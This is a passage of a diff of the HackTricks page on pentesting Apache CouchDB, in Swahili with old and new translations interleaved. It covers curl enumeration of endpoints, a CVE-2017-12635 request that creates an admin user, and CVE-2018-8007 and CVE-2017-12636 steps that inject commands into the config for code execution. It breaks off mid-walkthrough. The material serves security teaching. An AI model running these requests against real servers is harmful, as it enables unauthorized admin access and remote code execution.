<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

160
network-services-pentesting/5984-pentesting-couchdb.md
View file

@ -1,99 +1,100 @@
# 5984,6984 - Kupima Usalama wa CouchDB
# 5984,6984 - Pentesting CouchDB
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Taarifa Msingi**
## **Basic Information**
**CouchDB** ni **nururishi wa hati** wenye uwezo na nguvu ambao hupanga data kwa kutumia muundo wa **ramani ya funguo-na-thamani** ndani ya kila **hati**. Sehemu ndani ya hati inaweza kuwakilishwa kama **jozi za funguo/thamani, orodha, au ramani**, ikitoa uwezo wa kuhifadhi na kupata data kwa urahisi.
**CouchDB** ni **hifadhidata** yenye uwezo na inayoweza kubadilika ambayo inaratibu data kwa kutumia muundo wa **ramani ya funguo-thamani** ndani ya kila **document**. Sehemu ndani ya hati zinaweza kuwakilishwa kama **funguo/maadili, orodha, au ramani**, ikitoa kubadilika katika uhifadhi na upatikanaji wa data.
Kila **hati** iliyohifadhiwa kwenye CouchDB inapewa kitambulisho cha kipekee (`_id`) kwenye kiwango cha hati. Kwa kuongezea, kila mabadiliko yaliyofanywa na kuhifadhiwa kwenye hifadhidata yanapewa nambari ya **marekebisho** (`_rev`). Nambari hii ya marekebisho inaruhusu ufuatiliaji na usimamizi wa mabadiliko kwa ufanisi, kurahisisha upatikanaji na usawazishaji wa data ndani ya hifadhidata.
Kila **document** iliyohifadhiwa katika CouchDB inapewa **kitambulisho cha kipekee** (`_id`) katika kiwango cha hati. Zaidi ya hayo, kila mabadiliko yaliyofanywa na kuhifadhiwa kwenye hifadhidata yanapewa **nambari ya marekebisho** (`_rev`). Nambari hii ya marekebisho inaruhusu **kufuatilia na kusimamia mabadiliko** kwa ufanisi, ikirahisisha upatikanaji na usawazishaji wa data ndani ya hifadhidata.
**Bandari ya chaguo-msingi:** 5984(http), 6984(https)
**Port ya kawaida:** 5984(http), 6984(https)
```
PORT STATE SERVICE REASON
5984/tcp open unknown syn-ack
```
## **Uchambuzi wa Kiotomatiki**
## **Uhesabuaji wa Otomatiki**
```bash
nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum
```
### Bango
## Manual Enumeration
Kabla ya kuanza kuchunguza CouchDB, ni muhimu kuanza kwa kukusanya habari kuhusu mfumo huo. Moja ya njia za kufanya hivyo ni kuchunguza bango la CouchDB. Bango ni ujumbe unaotumwa na mfumo wa CouchDB wakati unapofanya ombi la kwanza. Inaweza kutoa habari muhimu kama toleo la CouchDB na maelezo mengine ya kifaa. Unaweza kutumia zana kama `telnet` au `nc` kuunganisha kwenye seva ya CouchDB na kuchunguza bango.
### Banner
```
curl http://IP:5984/
```
Hii inatoa ombi la GET kwa mfano wa CouchDB iliyosakinishwa. Jibu linapaswa kuonekana kama moja ya yafuatayo:
Hii inatoa ombi la GET kwa mfano wa CouchDB uliofungwa. Jibu linapaswa kuonekana kama mojawapo ya yafuatayo:
```bash
{"couchdb":"Welcome","version":"0.10.1"}
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
```
{% hint style="info" %}
Tafadhali kumbuka kuwa ikiwa unapata `401 Unauthorized` unapojaribu kufikia mizizi ya couchdb na ujumbe kama huu: `{"error":"unauthorized","reason":"Authentication required."}` **hutaweza kupata** bango au sehemu yoyote nyingine.
Kumbuka kwamba ikiwa unapata `401 Unauthorized` unapofikia mzizi wa couchdb na kitu kama hiki: `{"error":"unauthorized","reason":"Authentication required."}` **hutaweza kufikia** bendera au kiunganishi kingine chochote.
{% endhint %}
### Uchunguzi wa Taarifa
### Info Enumeration
Hizi ni sehemu ambapo unaweza kufikia kwa ombi la **GET** na kutoa taarifa muhimu. Unaweza kupata [**sehemu zaidi na maelezo zaidi katika nyaraka za couchdb**](https://docs.couchdb.org/en/latest/api/index.html).
Hizi ni kiunganishi ambacho unaweza kufikia kwa ombi la **GET** na kutoa taarifa za kuvutia. Unaweza kupata [**kiunganishi zaidi na maelezo ya kina katika nyaraka za couchdb**](https://docs.couchdb.org/en/latest/api/index.html).
* **`/_active_tasks`** Orodha ya kazi zinazoendelea, ikiwa ni pamoja na aina ya kazi, jina, hali na kitambulisho cha mchakato.
* **`/_all_dbs`** Inarudisha orodha ya maktaba zote katika kifaa cha CouchDB.
* **`/_cluster_setup`** Inarudisha hali ya kifaa au kikundi, kulingana na mchawi wa usanidi wa kikundi.
* **`/_db_updates`** Inarudisha orodha ya matukio yote ya maktaba katika kifaa cha CouchDB. Kuwepo kwa maktaba ya `_global_changes` kunahitajika ili kutumia sehemu hii.
* **`/_membership`** Inaonyesha vifaa ambavyo ni sehemu ya kikundi kama `cluster_nodes`. Uga wa `all_nodes` unaonyesha vifaa vyote ambavyo kifaa hiki kinajua, ikiwa ni pamoja na vile ambavyo ni sehemu ya kikundi.
* **`/_scheduler/jobs`** Orodha ya kazi za nakala. Maelezo ya kila kazi yatajumuisha habari ya chanzo na lengo, kitambulisho cha nakala, historia ya matukio ya hivi karibuni, na mambo mengine machache.
* **`/_scheduler/docs`** Orodha ya hali za hati za nakala. Inajumuisha habari kuhusu hati zote, hata katika hali za `completed` na `failed`. Kwa kila hati inarudisha kitambulisho cha hati, maktaba, kitambulisho cha nakala, chanzo na lengo, na habari nyingine.
* **`/_active_tasks`** Orodha ya kazi zinazofanyika, ikiwa ni pamoja na aina ya kazi, jina, hali na kitambulisho cha mchakato.
* **`/_all_dbs`** Inarudisha orodha ya hifadhidata zote katika mfano wa CouchDB.
* **`/_cluster_setup`** Inarudisha hali ya node au klasta, kulingana na msaidizi wa usanidi wa klasta.
* **`/_db_updates`** Inarudisha orodha ya matukio yote ya hifadhidata katika mfano wa CouchDB. Uwepo wa hifadhidata ya `_global_changes` unahitajika kutumia kiunganishi hiki.
* **`/_membership`** Inaonyesha nodes ambazo ni sehemu ya klasta kama `cluster_nodes`. Sehemu `all_nodes` inaonyesha nodes zote ambazo node hii inazijua, ikiwa ni pamoja na zile ambazo ni sehemu ya klasta.
* **`/_scheduler/jobs`** Orodha ya kazi za nakala. Maelezo ya kila kazi yatakuwa na taarifa za chanzo na lengo, kitambulisho cha nakala, historia ya tukio la hivi karibuni, na mambo mengine machache.
* **`/_scheduler/docs`** Orodha ya hali za hati za nakala. Inajumuisha taarifa kuhusu hati zote, hata katika hali za `completed` na `failed`. Kwa kila hati inarudisha kitambulisho cha hati, hifadhidata, kitambulisho cha nakala, chanzo na lengo, na taarifa nyingine.
* **`/_scheduler/docs/{replicator_db}`**
* **`/_scheduler/docs/{replicator_db}/{docid}`**
* **`/_node/{node-name}`** Sehemu ya `/_node/{node-name}` inaweza kutumika kuthibitisha jina la nodi ya Erlang ya seva inayoprocess ombi. Hii ni muhimu zaidi unapofikia `/_node/_local` ili kupata habari hii.
* **`/_node/{node-name}/_stats`** Rasilimali ya `_stats` inarudisha kitu cha JSON kinachojumuisha takwimu za seva inayofanya kazi. Kamba ya maandishi `_local` inatumika kama kifupi cha jina la nodi ya ndani, kwa hivyo kwa URL zote za takwimu, `{node-name}` inaweza kubadilishwa na `_local`, ili kuingiliana na takwimu za nodi ya ndani.
* **`/_node/{node-name}/_system`** Rasilimali ya \_system inarudisha kitu cha JSON kinachojumuisha takwimu mbalimbali za kiwango cha mfumo kwa seva inayofanya kazi. Unaweza kutumia `_local` kama {node-name} ili kupata habari ya nodi ya sasa.
* **`/_node/{node-name}`** Kiunganishi `/_node/{node-name}` kinaweza kutumika kuthibitisha jina la node ya Erlang ya seva inayoshughulikia ombi. Hii ni muhimu zaidi unapofikia `/_node/_local` ili kupata taarifa hii.
* **`/_node/{node-name}/_stats`** Rasilimali `_stats` inarudisha kitu cha JSON kinachojumuisha takwimu za seva inayofanya kazi. Mstari halisi `_local` hutumikia kama jina la badala kwa jina la node ya ndani, hivyo kwa URL zote za takwimu, `{node-name}` inaweza kubadilishwa na `_local`, ili kuingiliana na takwimu za node ya ndani.
* **`/_node/{node-name}/_system`** Rasilimali \_system inarudisha kitu cha JSON kinachojumuisha takwimu mbalimbali za kiwango cha mfumo kwa seva inayofanya kazi\_.\_ Unaweza kutumia \_\_`_local` kama {node-name} kupata taarifa za sasa za node.
* **`/_node/{node-name}/_restart`**
* **`/_up`** Inathibitisha kuwa seva iko juu, inafanya kazi, na iko tayari kujibu maombi. Ikiwa [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) ni `kweli` au `nolb`, sehemu itarudisha jibu la 404.
* **`/_uuids`** Inaomba kitambulisho kimoja au zaidi cha Kitambulisho cha Kipekee cha Kipekee (UUIDs) kutoka kifaa cha CouchDB.
* **`/_reshard`** Inarudisha idadi ya kazi zilizokamilika, zilizoshindwa, zinazoendelea, zilizosimamishwa, na jumla pamoja na hali ya kugawanya upya kwenye kikundi.
* **`/_up`** Inathibitisha kwamba seva iko juu, inafanya kazi, na iko tayari kujibu maombi. Ikiwa [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) ni `true` au `nolb`, kiunganishi kitarejesha jibu la 404.
* **`/_uuids`** Inahitaji kitambulisho kimoja au zaidi cha Kipekee Duniani (UUIDs) kutoka kwa mfano wa CouchDB.
* **`/_reshard`** Inarudisha hesabu ya kazi zilizokamilika, zilizoshindwa, zinazofanyika, zilizositishwa, na jumla pamoja na hali ya upya wa klasta.
Taarifa zaidi ya kuvutia inaweza kupatikana kama ilivyoelezwa hapa: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB)
Taarifa zaidi za kuvutia zinaweza kutolewa kama ilivyoelezwa hapa: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB)
### **Orodha ya Maktaba**
### **Orodha ya Hifadhidata**
```
curl -X GET http://IP:5984/_all_dbs
```
Ikiwa ombi hilo linajibu na 401 unauthorised, basi unahitaji **vyeti halali** ili kupata ufikiaji wa hifadhidata:
Ikiwa ombi hilo **linajibu na 401 isiyoidhinishwa**, basi unahitaji **vithibitisho halali** ili kufikia hifadhidata:
```
curl -X GET http://user:password@IP:5984/_all_dbs
```
Ili kupata Vitambulisho halali unaweza **jaribu** [**kuvunja nguvu huduma**](../generic-methodologies-and-resources/brute-force.md#couchdb).
Ili kupata Credentials halali unaweza **jaribu** [**kuvunjia huduma**](../generic-methodologies-and-resources/brute-force.md#couchdb).
Hii ni **mfano** wa jibu la couchdb unapokuwa na **mamlaka ya kutosha** ya kuorodhesha maktaba (Ni orodha tu ya maktaba):
Hii ni **mfano** wa **jibu** la couchdb unapokuwa na **mamlaka ya kutosha** ya kuorodhesha hifadhidata (Ni orodha tu ya dbs):
```bash
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
```
### Taarifa za Database
### Database Info
Unaweza kupata taarifa za database (kama vile idadi ya faili na ukubwa) kwa kufikia jina la database:
Unaweza kupata baadhi ya taarifa za database (kama vile idadi ya faili na ukubwa) kwa kufikia jina la database:
```bash
curl http://IP:5984/<database>
curl http://localhost:5984/simpsons
#Example response:
{"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"}
```
### **Orodha ya Nyaraka**
### **Orodha ya Hati**
Taja kila kuingia ndani ya kuhifadhi data
Orodha kila kipengee ndani ya hifadhidata
```bash
curl -X GET http://IP:5984/{dbname}/_all_docs
curl http://localhost:5984/simpsons/_all_docs
@ -108,47 +109,47 @@ curl http://localhost:5984/simpsons/_all_docs
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}
```
### **Soma Waraka**
### **Soma Hati**
Soma maudhui ya waraka ndani ya kuhifadhi data:
Soma maudhui ya hati ndani ya hifadhidata:
```bash
curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
#Example response:
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}
```
## Kuongeza Uteuzi wa Haki za CouchDB [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635)
## CouchDB Privilege Escalation [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635)
Kutokana na tofauti kati ya wapangaji wa JSON wa Erlang na JavaScript, unaweza **kuunda mtumiaji wa admin** na sifa za `hacktricks:hacktricks` kwa ombi lifuatalo:
Shukrani kwa tofauti kati ya parsers za Erlang na JavaScript JSON unaweza **kuunda mtumiaji wa admin** mwenye akauti `hacktricks:hacktricks` kwa ombi lifuatalo:
```bash
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json"
```
[**Maelezo zaidi kuhusu kasoro hii hapa**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html).
[**Taarifa zaidi kuhusu hii vuln hapa**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html).
## CouchDB RCE
### **Uchambuzi wa Usalama wa Kuki ya Erlang**
### **Muhtasari wa Usalama wa Keki ya Erlang**
Mfano [kutoka hapa](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
Katika nyaraka za CouchDB, hasa katika sehemu inayohusu usanidi wa kikundi ([kiungo](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), matumizi ya bandari na CouchDB katika hali ya kikundi yanajadiliwa. Imetajwa kuwa, kama katika hali ya kujitegemea, bandari `5984` hutumiwa. Kwa kuongezea, bandari `5986` ni kwa ajili ya API za ndani ya kifaa, na muhimu zaidi, Erlang inahitaji bandari ya TCP `4369` kwa Erlang Port Mapper Daemon (EPMD), inayorahisisha mawasiliano ya kifaa ndani ya kikundi cha Erlang. Usanidi huu unajenga mtandao ambapo kila kifaa kimeunganishwa na kila kifaa kingine.
Katika nyaraka za CouchDB, hasa katika sehemu inayohusiana na usanidi wa klasta ([kiungo](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), matumizi ya bandari na CouchDB katika hali ya klasta yanajadiliwa. Inatajwa kwamba, kama katika hali ya pekee, bandari `5984` inatumika. Aidha, bandari `5986` ni kwa APIs za ndani za node, na muhimu zaidi, Erlang inahitaji bandari ya TCP `4369` kwa ajili ya Erlang Port Mapper Daemon (EPMD), inayowezesha mawasiliano ya node ndani ya klasta ya Erlang. Usanidi huu unaunda mtandao ambapo kila node inahusishwa na kila node nyingine.
Onyo muhimu la usalama linasisitizwa kuhusu bandari `4369`. Ikiwa bandari hii inapatikana kupitia Mtandao au mtandao usioaminika, usalama wa mfumo unategemea sana kitambulisho kipekee kinachojulikana kama "kuki." Kuki hii inafanya kazi kama kinga. Kwa mfano, katika orodha ya michakato fulani, kuki inayoitwa "monster" inaweza kuonekana, ikionyesha jukumu lake katika mfumo wa usalama wa mfumo.
Taarifa muhimu ya usalama inasisitizwa kuhusu bandari `4369`. Ikiwa bandari hii itapatikana kupitia Mtandao au mtandao wowote usioaminika, usalama wa mfumo unategemea sana kitambulisho cha kipekee kinachojulikana kama "keki." Keki hii inafanya kazi kama kinga. Kwa mfano, katika orodha fulani ya michakato, keki iliyopewa jina "monster" inaweza kuonekana, ikionyesha jukumu lake katika mfumo wa usalama wa mfumo.
```
www-data@canape:/$ ps aux | grep couchdb
root 744 0.0 0.0 4240 640 ? Ss Sep13 0:00 runsv couchdb
root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /var/log/couchdb
homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b
```
Kwa wale wanaopenda kuelewa jinsi "cookie" hii inaweza kutumiwa kwa Remote Code Execution (RCE) ndani ya muktadha wa mifumo ya Erlang, sehemu maalum imeandikwa kwa ajili ya kusoma zaidi. Inaelezea njia za kutumia "cookies" za Erlang kwa njia zisizoidhinishwa ili kupata udhibiti wa mifumo. Unaweza **[kuchunguza mwongozo kamili wa kutumia "cookies" za Erlang kwa RCE hapa](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**.
Kwa wale wanaovutiwa na kuelewa jinsi "keki" hii inaweza kutumika kwa ajili ya Remote Code Execution (RCE) ndani ya muktadha wa mifumo ya Erlang, sehemu maalum inapatikana kwa ajili ya kusoma zaidi. Inabainisha mbinu za kutumia keki za Erlang kwa njia zisizoidhinishwa ili kupata udhibiti wa mifumo. Unaweza **[kuchunguza mwongozo wa kina juu ya kutumia keki za Erlang kwa RCE hapa](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**.
### **Kutumia CVE-2018-8007 kwa Kurekebisha local.ini**
### **Kutatua CVE-2018-8007 kupitia Marekebisho ya local.ini**
Mfano [kutoka hapa](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
Ugunduzi wa hivi karibuni wa udhaifu, CVE-2018-8007, unaathiri Apache CouchDB na ulichunguzwa, ukiweka wazi kuwa kutumia udhaifu huu kunahitaji ruhusa ya kuandika kwenye faili ya `local.ini`. Ingawa haifai moja kwa moja kwa mfumo wa lengo la awali kutokana na vizuizi vya usalama, marekebisho yalifanywa ili kutoa ruhusa ya kuandika kwenye faili ya `local.ini` kwa madhumuni ya uchunguzi. Hatua za kina na mifano ya nambari zinatolewa hapa chini, zikionyesha mchakato huo.
Uthibitisho wa hivi karibuni wa udhaifu, CVE-2018-8007, unaoathiri Apache CouchDB ulifanyiwa uchambuzi, ukionyesha kwamba matumizi yanahitaji ruhusa za kuandika kwenye faili `local.ini`. Ingawa si moja kwa moja inatumika kwa mfumo wa lengo wa awali kutokana na vizuizi vya usalama, marekebisho yalifanywa ili kutoa ufikiaji wa kuandika kwenye faili `local.ini` kwa ajili ya madhumuni ya uchunguzi. Hatua za kina na mifano ya msimbo zinatolewa hapa chini, zikionyesha mchakato.
Kwanza, mazingira yanatayarishwa kwa kuhakikisha kuwa faili ya `local.ini` inaweza kuandikwa, ikathibitishwa kwa kuorodhesha ruhusa:
Kwanza, mazingira yanaandaliwa kwa kuhakikisha faili `local.ini` inaweza kuandikwa, ikithibitishwa kwa kuorodhesha ruhusa:
```bash
root@canape:/home/homer/etc# ls -l
-r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini
@ -156,11 +157,11 @@ root@canape:/home/homer/etc# ls -l
-r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk
-r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args
```
Kuendeleza udhaifu huu, amri ya curl inatekelezwa, ikilenga usanidi wa `cors/origins` katika `local.ini`. Hii inaingiza chanzo kipya pamoja na amri za ziada chini ya sehemu ya `[os_daemons]`, lengo likiwa ni kutekeleza nambari ya aina yoyote:
Ili kutumia udhaifu huo, amri ya curl inatekelezwa, ikilenga usanidi wa `cors/origins` katika `local.ini`. Hii inaingiza asili mpya pamoja na amri za ziada chini ya sehemu ya `[os_daemons]`, ikilenga kutekeleza msimbo wa kiholela:
```bash
www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf"
```
Uthibitisho unaofuata unaonyesha usanidi ulioingizwa katika `local.ini`, ukilinganisha na nakala rudufu ili kuonyesha mabadiliko:
Uthibitisho wa baadaye unaonyesha usanidi ulioingizwa katika `local.ini`, ukilinganisha na nakala ya akiba ili kuonyesha mabadiliko:
```bash
root@canape:/home/homer/etc# diff local.ini local.ini.bk
119,124d118
@ -169,77 +170,78 @@ root@canape:/home/homer/etc# diff local.ini local.ini.bk
< [os_daemons]
< test_daemon = /usr/bin/touch /tmp/0xdf
```
Kwa sasa, faili inayotarajiwa (`/tmp/0xdf`) haipo, ikionyesha kuwa amri iliyochomwa haijaendeshwa bado. Uchunguzi zaidi unaonyesha kuwa kuna michakato inayohusiana na CouchDB inayoendelea, ikiwa ni pamoja na moja ambayo inaweza kutekeleza amri iliyochomwa:
Awali, faili inatarajiwa (`/tmp/0xdf`) halipo, ikionyesha kwamba amri iliyowekwa haijatekelezwa bado. Uchunguzi zaidi unaonyesha kwamba michakato inayohusiana na CouchDB inafanya kazi, ikiwa ni pamoja na moja ambayo inaweza kutekeleza amri iliyowekwa:
```bash
root@canape:/home/homer/bin# ps aux | grep couch
```
Kwa kumaliza mchakato wa CouchDB uliothibitishwa na kuruhusu mfumo kuizindua tena kiotomatiki, utekelezaji wa amri iliyowekwa ndani unaanzishwa, kama inavyothibitishwa na uwepo wa faili iliyokosekana awali:
Kwa kumaliza mchakato wa CouchDB ulioainishwa na kuruhusu mfumo kuanzisha upya kiotomatiki, utekelezaji wa amri iliyowekwa unachochewa, kuthibitishwa na uwepo wa faili iliyokosekana hapo awali:
```bash
root@canape:/home/homer/etc# kill 711
root@canape:/home/homer/etc# ls /tmp/0xdf
/tmp/0xdf
```
Uchunguzi huu unathibitisha uwezekano wa kufaidika na CVE-2018-8007 chini ya hali maalum, hasa hitaji la kupata ufikiaji wa kuandika kwenye faili ya `local.ini`. Mifano ya nambari iliyotolewa na hatua za utaratibu zinatoa mwongozo wazi wa kuiga shambulio katika mazingira yaliyodhibitiwa.
Hii uchunguzi inathibitisha uwezekano wa unyakuzi wa CVE-2018-8007 chini ya hali maalum, hasa hitaji la ufikiaji wa kuandika kwenye faili `local.ini`. Mifano ya msimbo iliyotolewa na hatua za utaratibu zinatoa mwongozo wazi wa kuiga unyakuzi katika mazingira yaliyodhibitiwa.
Kwa maelezo zaidi kuhusu CVE-2018-8007, angalia taarifa ya mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/).
Kwa maelezo zaidi kuhusu CVE-2018-8007, rejelea taarifa kutoka mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/).
### **Uchunguzi wa CVE-2017-12636 na Ruhusa ya Kuandika kwenye local.ini**
### **Kuchunguza CVE-2017-12636 na Ruhusa za Kuandika kwenye local.ini**
Mfano [kutoka hapa](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
Udhaifu unaojulikana kama CVE-2017-12636 ulichunguzwa, ambao unawezesha utekelezaji wa nambari kupitia mchakato wa CouchDB, ingawa mipangilio maalum inaweza kuzuia utumiaji wake. Licha ya marejeleo mengi ya Proof of Concept (POC) yanayopatikana mtandaoni, marekebisho yanahitajika ili kutumia udhaifu huo kwenye toleo la CouchDB 2, tofauti na toleo la kawaida linalolengwa la 1.x. Hatua za awali zinahusisha kuthibitisha toleo la CouchDB na kuhakikisha kutokuwepo kwa njia ya seva ya maswali inayotarajiwa.
Uthibitisho wa udhaifu unaojulikana kama CVE-2017-12636 ulifanyiwa uchunguzi, ambao unaruhusu utekelezaji wa msimbo kupitia mchakato wa CouchDB, ingawa usanidi maalum unaweza kuzuia unyakuzi wake. Licha ya marejeleo mengi ya Ushahidi wa Dhana (POC) yanayopatikana mtandaoni, marekebisho yanahitajika ili kuweza kutumia udhaifu kwenye toleo la CouchDB 2, tofauti na toleo linalolengwa mara nyingi 1.x. Hatua za awali zinajumuisha kuthibitisha toleo la CouchDB na kuthibitisha kutokuwepo kwa njia ya seva za uchunguzi zinazotarajiwa:
```bash
curl http://localhost:5984
curl http://0xdf:df@localhost:5984/_config/query_servers/
```
Kuwezesha CouchDB toleo 2.0, njia mpya hutumiwa:
Ili kuendana na toleo la CouchDB 2.0, njia mpya inatumika:
```bash
curl 'http://0xdf:df@localhost:5984/_membership'
curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers
```
Majaribio ya kuongeza na kutekeleza seva mpya ya maswali yalikumbana na makosa yanayohusiana na ruhusa, kama ilivyodhihirishwa na matokeo yafuatayo:
Majaribio ya kuongeza na kuitisha seva mpya ya uchunguzi yalikutana na makosa yanayohusiana na ruhusa, kama inavyoonyeshwa na matokeo yafuatayo:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
```
Uchunguzi zaidi ulifunua matatizo ya ruhusa na faili ya `local.ini`, ambayo haikuweza kuandikwa. Kwa kubadilisha ruhusa za faili kwa kutumia upatikanaji wa mizizi au homer, ilikuwa inawezekana kuendelea:
Uchunguzi zaidi ulibaini matatizo ya ruhusa na faili ya `local.ini`, ambayo haikuweza kuandikwa. Kwa kubadilisha ruhusa za faili kwa kutumia root au ufikiaji wa homer, ilikua inawezekana kuendelea:
```bash
cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b
chmod 666 /home/homer/etc/local.ini
```
Majaribio ya baadaye ya kuongeza seva ya utafutaji yalifanikiwa, kama inavyothibitishwa na kutokuwepo kwa ujumbe wa kosa katika majibu. Kubadilisha faili ya `local.ini` kwa mafanikio kulithibitishwa kupitia kulinganisha faili:
Majaribio ya baadaye ya kuongeza seva ya uchunguzi yalifanikiwa, kama inavyoonyeshwa na ukosefu wa ujumbe wa makosa katika jibu. Marekebisho ya mafanikio ya faili ya `local.ini` yalithibitishwa kupitia kulinganisha faili:
```bash
